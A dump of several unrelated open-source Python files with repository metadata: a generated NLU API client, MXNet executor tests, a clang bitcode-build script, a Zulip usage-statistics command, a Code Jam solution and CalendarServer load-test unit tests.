def synonym_entity_extractor_update_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update training samples by UUID. # noqa: E501
Update training samples of the named synonym entity extractor. A sample's UUID is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUID is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_update_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update training samples by UUID. # noqa: E501
Update training samples of the named synonym entity extractor. A sample's UUID is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUID is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_update_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_update_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_update_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_vaporise(self, instance_name, **kwargs): # noqa: E501
"""Vaporise the named model. # noqa: E501
Permanently vaporises a model even if not trashed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_vaporise(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_vaporise_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_vaporise_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_vaporise_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Vaporise the named model. # noqa: E501
Permanently vaporises a model even if not trashed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_vaporise_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_vaporise" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_vaporise`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/vaporise', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
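# Client-level sketch of the pattern shared by every method in this generated
# module: each public method forwards to its *_with_http_info twin, which
# validates parameters and dispatches through self.api_client.call_api; with
# async_req=True the call returns a thread-like handle instead of data. The
# instance name is an illustrative assumption.
#
#     detail = api.synonym_entity_extractor_vaporise('my-extractor')
#     handle = api.synonym_entity_extractor_vaporise('my-extractor',
#                                                    async_req=True)
#     detail = handle.get()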
| 45.336395 | 169 | 0.644236 |
b31bd3a4ad152944df16c494f522c348d647fdb7 | 4,813 | py | Python | tests/python/unittest/test_executor.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | ["Apache-2.0"] | 9 | 2018-06-12T12:12:56.000Z | 2020-11-26T01:45:15.000Z | tests/python/unittest/test_executor.py | achao2013/mxnet-quantify | ae77c896da6db35530390e3cf8e524d553bba112 | ["Apache-2.0"] | 1 | 2020-01-26T19:53:49.000Z | 2020-01-26T19:53:49.000Z | tests/python/unittest/test_executor.py | achao2013/mxnet-quantify | ae77c896da6db35530390e3cf8e524d553bba112 | ["Apache-2.0"] | 14 | 2016-11-18T07:21:41.000Z | 2019-09-30T08:48:22.000Z |
import numpy as np
import mxnet as mx
def reldiff(a, b):
"""Return the L1-normalised relative error, sum(|a - b|) / sum(|a|)."""
diff = np.sum(np.abs(a - b))
norm = np.sum(np.abs(a))
reldiff = diff / norm
return reldiff
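# Illustrative sanity check (values assumed, not part of the original tests):
# reldiff(np.array([1., 2.]), np.array([1., 2.0003])) == 0.0003 / 3.0 == 1e-4.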
def check_bind_with_uniform(uf, gf, dim, sf=None, lshape=None, rshape=None):
"""check function consistency with uniform random numbers"""
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
lhs = mx.symbol.Variable('lhs')
rhs = mx.symbol.Variable('rhs')
if sf is not None:
ret = sf(lhs, rhs)
else:
ret = uf(lhs, rhs)
assert ret.list_arguments() == ['lhs', 'rhs']
lshape = shape if lshape is None else lshape
rshape = shape if rshape is None else rshape
lhs_arr = mx.nd.array(np.random.uniform(-1, 1, lshape))
rhs_arr = mx.nd.array(np.random.uniform(-1, 1, rshape))
lhs_grad = mx.nd.empty(lshape)
rhs_grad = mx.nd.empty(rshape)
executor = ret.bind(mx.Context('cpu'),
args=[lhs_arr, rhs_arr],
args_grad=[lhs_grad, rhs_grad])
exec3 = ret.bind(mx.Context('cpu'),
args=[lhs_arr, rhs_arr])
exec4 = ret.bind(mx.Context('cpu'),
args={'rhs': rhs_arr, 'lhs': lhs_arr},
args_grad={'lhs': lhs_grad, 'rhs': rhs_grad})
executor.forward()
exec3.forward()
exec4.forward()
out2 = executor.outputs[0].asnumpy()
out1 = uf(lhs_arr.asnumpy(), rhs_arr.asnumpy())
out3 = exec3.outputs[0].asnumpy()
out4 = exec4.outputs[0].asnumpy()
assert reldiff(out1, out2) < 1e-6
assert reldiff(out1, out3) < 1e-6
assert reldiff(out1, out4) < 1e-6
# test gradient
out_grad = mx.nd.array(np.ones(out2.shape))
lhs_grad2, rhs_grad2 = gf(out_grad.asnumpy(),
lhs_arr.asnumpy(),
rhs_arr.asnumpy())
executor.backward([out_grad])
assert reldiff(lhs_grad.asnumpy(), lhs_grad2) < 1e-6
assert reldiff(rhs_grad.asnumpy(), rhs_grad2) < 1e-6
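# Example of the helper above (this is the first case exercised in test_bind
# below): for elementwise addition the analytic gradient of both operands is
# the upstream gradient itself.
#
#     check_bind_with_uniform(lambda x, y: x + y,
#                             lambda g, x, y: (g, g),
#                             dim=2)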
def test_bind():
np.random.seed(0)
nrepeat = 10
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
check_bind_with_uniform(lambda x, y: x + y,
lambda g, x, y: (g, g),
dim)
check_bind_with_uniform(lambda x, y: x - y,
lambda g, x, y: (g, -g),
dim)
check_bind_with_uniform(lambda x, y: x * y,
lambda g, x, y: (y * g, x * g),
dim)
check_bind_with_uniform(lambda x, y: x / y,
lambda g, x, y: (g / y, -x * g / (y**2)),
dim)
check_bind_with_uniform(lambda x, y: np.maximum(x, y),
lambda g, x, y: (g * (x>y), g * (y>x)),
dim,
sf=mx.symbol.maximum)
check_bind_with_uniform(lambda x, y: np.minimum(x, y),
lambda g, x, y: (g * (x<y), g * (y<x)),
dim,
sf=mx.symbol.minimum)
def test_dot():
np.random.seed(0)
nrepeat = 10
maxdim = 4
for repeat in range(nrepeat):
s = tuple(np.random.randint(1, 500, size=3))
check_bind_with_uniform(lambda x, y: np.dot(x, y),
lambda g, x, y: (np.dot(g, y.T), np.dot(x.T, g)),
2,
lshape=(s[0], s[1]),
rshape=(s[1], s[2]),
sf=mx.symbol.dot)
for repeat in range(nrepeat):
s = tuple(np.random.randint(1, 500, size=1))
check_bind_with_uniform(lambda x, y: np.dot(x, y),
lambda g, x, y: (g * y, g * x),
2,
lshape=(s[0],),
rshape=(s[0],),
sf=mx.symbol.dot)
def test_reshape():
x = mx.sym.Variable('x')
y = mx.sym.FullyConnected(x, num_hidden=4)
exe = y.simple_bind(mx.cpu(), x=(5,4))
exe.arg_arrays[0][:] = 1
exe.arg_arrays[1][:] = mx.nd.ones((4,4))
exe.arg_arrays[2][:] = 0
new_exe = exe.reshape(x=(3,4))
new_exe.forward(is_train=False)
# test sub exec forward
assert np.all(new_exe.outputs[0].asnumpy() == 4)
# test shared memory
assert np.all(exe.outputs[0].asnumpy()[:3] == 4)
# test base exec forward
exe.forward(is_train=False)
assert np.all(exe.outputs[0].asnumpy() == 4)
if __name__ == "__main__":
test_bind()
test_reshape()
| 35.651852 | 81 | 0.484729 |
9cdb9cb5334aacf4c1be5312ee84a085523f701b | 873 | py | Python | BytecodeBuilder.py | gydrogen/hydrogen | 6c448b67471ce2bbef12a36a0182b58ac56a7da3 | ["MIT"] | null | null | null | BytecodeBuilder.py | gydrogen/hydrogen | 6c448b67471ce2bbef12a36a0182b58ac56a7da3 | ["MIT"] | null | null | null | BytecodeBuilder.py | gydrogen/hydrogen | 6c448b67471ce2bbef12a36a0182b58ac56a7da3 | ["MIT"] | null | null | null |
import os
from sys import argv
def build(file, tag=''):
if not os.path.isfile(file):
print(f'{file} is not a valid input file.')
return
pwd = os.getcwd()
path, infile = os.path.split(file)
outfile = infile.replace('.c', f'{tag}.bc', 1)
os.chdir(path)
command = f"clang -c -O0 -Xclang -disable-O0-optnone -g -emit-llvm -S {infile} -o {outfile}"
print(f'In directory {path} execute {command}')
os.system(command)
os.chdir(pwd)
files = [
'./TestPrograms/Buggy/Prog.c',
'./TestPrograms/Buggy2/Prog.c',
'./TestPrograms/Correct/Prog.c',
'./TestPrograms/Mine/Ladybug1/main.c',
'./TestPrograms/Mine/Ladybug2/main.c',
'./TestPrograms/Mine/Ladybug3/main.c',
]
for v in files:
build(v)
# if len(argv) > 1:
# build(argv[1])
# else:
# print('Usage: python3 BytecodeBuilder.py <filename>')
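# For reference, './TestPrograms/Buggy/Prog.c' with the default empty tag
# produces the command below, executed from inside ./TestPrograms/Buggy:
#
#     clang -c -O0 -Xclang -disable-O0-optnone -g -emit-llvm -S Prog.c -o Prog.bc
#
# A non-empty tag is spliced into the output name, e.g. build(file, tag='.dbg')
# would emit Prog.dbg.bc (the tag value here is an illustrative assumption).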
| 25.676471 | 96 | 0.616266 |
541cc44ffd403ff148ceb006127bfea30f4b22c7 | 3,761 | py | Python | analytics/management/commands/analyze_mit.py | MarkCupitt/zulip | 86bb9a9431084e59b491ca7980ec4f4333eb96f7 | ["Apache-2.0"] | 1 | 2017-07-27T19:49:12.000Z | 2017-07-27T19:49:12.000Z | analytics/management/commands/analyze_mit.py | eric-erki/zulip | a063dd3b26f7ada794e14ace0d24ea1834611446 | ["Apache-2.0"] | 9 | 2021-02-08T20:22:39.000Z | 2022-02-11T03:40:19.000Z | analytics/management/commands/analyze_mit.py | tobby2002/zulip | 66e7c455759f9368bae16b9a604cf63f8e3524cd | ["Apache-2.0"] | 1 | 2021-04-09T05:50:23.000Z | 2021-04-09T05:50:23.000Z |
from __future__ import absolute_import
from __future__ import print_function
from typing import Any, Dict
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import Recipient, Message
from zerver.lib.timestamp import timestamp_to_datetime
import datetime
import time
import logging
def compute_stats(log_level):
# type: (int) -> None
logger = logging.getLogger()
logger.setLevel(log_level)
one_week_ago = timestamp_to_datetime(time.time()) - datetime.timedelta(weeks=1)
mit_query = Message.objects.filter(sender__realm__domain="mit.edu",
recipient__type=Recipient.STREAM,
pub_date__gt=one_week_ago)
for bot_sender_start in ["imap.", "rcmd.", "sys."]:
mit_query = mit_query.exclude(sender__email__startswith=(bot_sender_start))
# Filtering for "/" covers tabbott/extra@ and all the daemon/foo bots.
mit_query = mit_query.exclude(sender__email__contains=("/"))
mit_query = mit_query.exclude(sender__email__contains=("aim.com"))
mit_query = mit_query.exclude(
sender__email__in=["rss@mit.edu", "bash@mit.edu", "apache@mit.edu",
"bitcoin@mit.edu", "lp@mit.edu", "clocks@mit.edu",
"root@mit.edu", "nagios@mit.edu",
"www-data|local-realm@mit.edu"])
user_counts = {} # type: Dict[str, Dict[str, int]]
for m in mit_query.select_related("sending_client", "sender"):
email = m.sender.email
user_counts.setdefault(email, {})
user_counts[email].setdefault(m.sending_client.name, 0)
user_counts[email][m.sending_client.name] += 1
total_counts = {} # type: Dict[str, int]
total_user_counts = {} # type: Dict[str, int]
for email, counts in user_counts.items():
total_user_counts.setdefault(email, 0)
for client_name, count in counts.items():
total_counts.setdefault(client_name, 0)
total_counts[client_name] += count
total_user_counts[email] += count
logging.debug("%40s | %10s | %s" % ("User", "Messages", "Percentage Zulip"))
top_percents = {} # type: Dict[int, float]
for size in [10, 25, 50, 100, 200, len(total_user_counts.keys())]:
top_percents[size] = 0.0
for i, email in enumerate(sorted(total_user_counts.keys(),
key=lambda x: -total_user_counts[x])):
percent_zulip = round(100 - (user_counts[email].get("zephyr_mirror", 0)) * 100. /
total_user_counts[email], 1)
for size in top_percents.keys():
top_percents.setdefault(size, 0)
if i < size:
top_percents[size] += (percent_zulip * 1.0 / size)
logging.debug("%40s | %10s | %s%%" % (email, total_user_counts[email],
percent_zulip))
logging.info("")
for size in sorted(top_percents.keys()):
logging.info("Top %6s | %s%%" % (size, round(top_percents[size], 1)))
grand_total = sum(total_counts.values())
print(grand_total)
logging.info("%15s | %s" % ("Client", "Percentage"))
for client in total_counts.keys():
logging.info("%15s | %s%%" % (client, round(100. * total_counts[client] / grand_total, 1)))
class Command(BaseCommand):
option_list = BaseCommand.option_list + \
(make_option('--verbose', default=False, action='store_true'),)
help = "Compute statistics on MIT Zephyr usage."
def handle(self, *args, **options):
# type: (*Any, **Any) -> None
level = logging.INFO
if options["verbose"]:
level = logging.DEBUG
compute_stats(level)
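# Typical invocation, as a Django management command (the manage.py entry
# point is an assumption about the deployment, not part of this file):
#
#     python manage.py analyze_mit --verbose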
| 43.229885 | 99 | 0.620048 |
dffc0ac6f2e9f1c76ebaa025e98761dce995c643 | 663 | py | Python | codejam/14/0q/a-magic.py | neizod/problems | 180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a | ["MIT"] | 1 | 2015-10-17T11:15:42.000Z | 2015-10-17T11:15:42.000Z | codejam/14/0q/a-magic.py | neizod/problems | 180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a | ["MIT"] | null | null | null | codejam/14/0q/a-magic.py | neizod/problems | 180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a | ["MIT"] | null | null | null |
def foo(answer_1, matrix_1, answer_2, matrix_2):
# The chosen card must appear in the volunteer's selected row of both
# arrangements, so the answer is the intersection of the two rows.
candidate_1 = matrix_1[answer_1-1]
candidate_2 = matrix_2[answer_2-1]
final = set(candidate_1) & set(candidate_2)
if len(final) == 0:
return 'Volunteer cheated!'
elif len(final) > 1:
return 'Bad magician!'
else:
return final.pop()
for case in range(int(input())):
answer_1 = int(input())
matrix_1 = [[int(n) for n in input().split()] for _ in range(4)]
answer_2 = int(input())
matrix_2 = [[int(n) for n in input().split()] for _ in range(4)]
answer = foo(answer_1, matrix_1, answer_2, matrix_2)
print('Case #{}: {}'.format(case+1, answer))
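# Worked example (illustrative grids): with answer_1 = 1, a first grid whose
# row 1 is [1, 2, 3, 4], answer_2 = 1, and a second grid whose row 1 is
# [1, 5, 9, 13], the row intersection is {1}, so foo returns 1. An empty
# intersection yields 'Volunteer cheated!' and more than one common card
# yields 'Bad magician!'.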
| 33.15 | 68 | 0.616893 |
28f730efdc85440dca79bc391746dfdca8a03165 | 22,252 | py | Python | contrib/performance/loadtest/test_sim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | ["Apache-2.0"] | 462 | 2016-08-14T17:43:24.000Z | 2022-03-17T07:38:16.000Z | contrib/performance/loadtest/test_sim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | ["Apache-2.0"] | 72 | 2016-09-01T23:19:35.000Z | 2020-02-05T02:09:26.000Z | contrib/performance/loadtest/test_sim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | ["Apache-2.0"] | 171 | 2016-08-16T03:50:30.000Z | 2022-03-26T11:49:55.000Z |
##
# Copyright (c) 2011-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
from plistlib import writePlistToString
from cStringIO import StringIO
from twisted.python.log import msg
from twisted.python.usage import UsageError
from twisted.python.filepath import FilePath
from twisted.internet.defer import Deferred, succeed
from twisted.trial.unittest import TestCase
from contrib.performance.stats import NormalDistribution
from contrib.performance.loadtest.ical import OS_X_10_6
from contrib.performance.loadtest.profiles import Eventer, Inviter, Accepter
from contrib.performance.loadtest.population import (
SmoothRampUp, ClientType, PopulationParameters, Populator, CalendarClientSimulator,
ProfileType, SimpleStatistics
)
from contrib.performance.loadtest.sim import (
Arrival, SimOptions, LoadSimulator, LagTrackingReactor,
_DirectoryRecord
)
VALID_CONFIG = {
'servers': {
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
'webadmin': {
'enabled': True,
'HTTPPort': 8080,
},
'arrival': {
'factory': 'contrib.performance.loadtest.population.SmoothRampUp',
'params': {
'groups': 10,
'groupSize': 1,
'interval': 3,
},
},
}
VALID_CONFIG_PLIST = writePlistToString(VALID_CONFIG)
class SimOptionsTests(TestCase):
def test_defaultConfig(self):
"""
If the I{config} option is not specified, the default config.plist in
the source tree is used.
"""
options = SimOptions()
self.assertEqual(options['config'], FilePath(__file__).sibling('config.plist'))
def test_configFileNotFound(self):
"""
If the filename given to the I{config} option is not found,
L{SimOptions.parseOptions} raises a L{UsageError} indicating
this.
"""
name = FilePath(self.mktemp())
options = SimOptions()
exc = self.assertRaises(
UsageError, options.parseOptions, ['--config', name.path])
self.assertEquals(
str(exc), "--config %s: No such file or directory" % (name.path,))
def test_configFileNotParseable(self):
"""
If the contents of the file given to the I{config} option
cannot be parsed by L{ConfigParser},
L{SimOptions.parseOptions} raises a L{UsageError} indicating
this.
"""
config = FilePath(self.mktemp())
config.setContent("some random junk")
options = SimOptions()
exc = self.assertRaises(
UsageError, options.parseOptions, ['--config', config.path])
self.assertEquals(
str(exc),
"--config %s: syntax error: line 1, column 0" % (config.path,))
class CalendarClientSimulatorTests(TestCase):
"""
Tests for L{CalendarClientSimulator} which adds running clients to
a simulation.
"""
realmName = 'stub'
def _user(self, name):
password = 'password-' + name
email = name + "@example.com"
record = _DirectoryRecord(name, password, name, email, name)
return record
def test_createUser(self):
"""
Subsequent calls to L{CalendarClientSimulator._createUser}
with different user numbers return user details from different
directory records.
"""
calsim = CalendarClientSimulator(
[self._user('alice'), self._user('bob'), self._user('carol')],
Populator(None), None, None, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
users = sorted([
calsim._createUser(0)[1],
calsim._createUser(1)[1],
calsim._createUser(2)[1],
])
self.assertEqual(['alice', 'bob', 'carol'], users)
def test_createUserAuthInfo(self):
"""
The auth handler returned by L{CalendarClientSimulator._createUser}
includes the password taken from user's directory record.
"""
calsim = CalendarClientSimulator(
[self._user('alice')],
Populator(None), None, None, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
_ignore_record, user, auth = calsim._createUser(0)
self.assertEqual(
auth['basic'].passwd.find_user_password('Test Realm', 'http://example.org:1234/')[1],
'password-' + user)
self.assertEqual(
auth['digest'].passwd.find_user_password('Test Realm', 'http://example.org:1234/')[1],
'password-' + user)
def test_stop(self):
"""
After L{CalendarClientSimulator.stop} is called, failed clients and
profiles are not logged.
"""
class BrokenClient(object):
def __init__(self, reactor, serverAddress, principalPathTemplate, serializationPath, userInfo, auth, instanceNumber, runResult):
self._runResult = runResult
def run(self):
return self._runResult
def stop(self):
return succeed(None)
class BrokenProfile(object):
def __init__(self, reactor, simulator, client, userNumber, runResult):
self._runResult = runResult
self.enabled = True
def initialize(self):
return succeed(None)
def run(self):
return self._runResult
clientRunResult = Deferred()
profileRunResult = Deferred()
params = PopulationParameters()
params.addClient(1, ClientType(
BrokenClient, {'runResult': clientRunResult},
[ProfileType(BrokenProfile, {'runResult': profileRunResult})])
)
sim = CalendarClientSimulator(
[self._user('alice')], Populator(None), None, params, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
sim.add(1, 1)
sim.stop()
clientRunResult.errback(RuntimeError("Some fictional client problem"))
profileRunResult.errback(RuntimeError("Some fictional profile problem"))
self.assertEqual([], self.flushLoggedErrors())
class Reactor(object):
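    # Test double for a Twisted reactor: run() executes the queued
    # callWhenRunning thunks, logs one observable event, and then fires any
    # registered 'shutdown' triggers synchronously.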
message = "some event to be observed"
def __init__(self):
self._triggers = []
self._whenRunning = []
def run(self):
for thunk in self._whenRunning:
thunk()
msg(thingo=self.message)
for _ignore_phase, event, thunk in self._triggers:
if event == 'shutdown':
thunk()
def callWhenRunning(self, thunk):
self._whenRunning.append(thunk)
def addSystemEventTrigger(self, phase, event, thunk):
self._triggers.append((phase, event, thunk))
class Observer(object):
def __init__(self):
self.reported = False
self.events = []
def observe(self, event):
self.events.append(event)
def report(self, output):
self.reported = True
def failures(self):
return []
class NullArrival(object):
def run(self, sim):
pass
class StubSimulator(LoadSimulator):
def run(self):
return 3
class LoadSimulatorTests(TestCase):
def test_main(self):
"""
L{LoadSimulator.main} raises L{SystemExit} with the result of
L{LoadSimulator.run}.
"""
config = FilePath(self.mktemp())
config.setContent(VALID_CONFIG_PLIST)
exc = self.assertRaises(
SystemExit, StubSimulator.main, ['--config', config.path])
self.assertEquals(
exc.args, (StubSimulator(None, None, None, None, None, None, None).run(),))
def test_createSimulator(self):
"""
L{LoadSimulator.createSimulator} creates a L{CalendarClientSimulator}
with its own reactor and host and port information from the
configuration file.
"""
servers = {
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
}
reactor = object()
sim = LoadSimulator(servers, None, None, None, None, None, None, reactor=reactor)
calsim = sim.createSimulator()
self.assertIsInstance(calsim, CalendarClientSimulator)
self.assertIsInstance(calsim.reactor, LagTrackingReactor)
self.assertIdentical(calsim.reactor._reactor, reactor)
self.assertEquals(calsim.servers, servers)
def test_loadAccountsFromFile(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to create user records for use in the
simulation.
"""
accounts = FilePath(self.mktemp())
accounts.setContent("foo,bar,baz,quux,goo\nfoo2,bar2,baz2,quux2,goo2\n")
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.recordsFromCSVFile",
"params": {
"path": accounts.path,
"interleavePods": True,
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
io = StringIO()
sim = LoadSimulator.fromCommandLine(['--config', configpath.path], io)
self.assertEquals(io.getvalue(), "Loaded 2 accounts.\n")
self.assertEqual(2, len(sim.records))
self.assertEqual(sim.records[0].uid, 'foo')
self.assertEqual(sim.records[0].password, 'bar')
self.assertEqual(sim.records[0].commonName, 'baz')
self.assertEqual(sim.records[0].email, 'quux')
self.assertEqual(sim.records[1].uid, 'foo2')
self.assertEqual(sim.records[1].password, 'bar2')
self.assertEqual(sim.records[1].commonName, 'baz2')
self.assertEqual(sim.records[1].email, 'quux2')
def test_loadDefaultAccountsFromFile(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader (with
        empty path) from the config file and uses it to create user
records for use in the simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.recordsFromCSVFile",
"params": {
"path": "",
"interleavePods": True,
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(99, len(sim.records))
self.assertEqual(sim.records[0].uid, 'user01')
self.assertEqual(sim.records[0].password, 'user01')
self.assertEqual(sim.records[0].commonName, 'User 01')
self.assertEqual(sim.records[0].email, 'user01@example.com')
self.assertEqual(sim.records[98].uid, 'user99')
self.assertEqual(sim.records[98].password, 'user99')
self.assertEqual(sim.records[98].commonName, 'User 99')
self.assertEqual(sim.records[98].email, 'user99@example.com')
def test_generateRecordsDefaultPatterns(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to generate user records for use in the
simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.generateRecords",
"params": {
"count": 2
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(2, len(sim.records))
self.assertEqual(sim.records[0].uid, 'user1')
self.assertEqual(sim.records[0].password, 'user1')
self.assertEqual(sim.records[0].commonName, 'User 1')
self.assertEqual(sim.records[0].email, 'user1@example.com')
self.assertEqual(sim.records[1].uid, 'user2')
self.assertEqual(sim.records[1].password, 'user2')
self.assertEqual(sim.records[1].commonName, 'User 2')
self.assertEqual(sim.records[1].email, 'user2@example.com')
def test_generateRecordsNonDefaultPatterns(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to generate user records for use in the
simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.generateRecords",
"params": {
"count": 3,
"uidPattern": "USER%03d",
"passwordPattern": "PASSWORD%03d",
"namePattern": "Test User %03d",
"emailPattern": "USER%03d@example2.com",
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(3, len(sim.records))
self.assertEqual(sim.records[0].uid, 'USER001')
self.assertEqual(sim.records[0].password, 'PASSWORD001')
self.assertEqual(sim.records[0].commonName, 'Test User 001')
self.assertEqual(sim.records[0].email, 'USER001@example2.com')
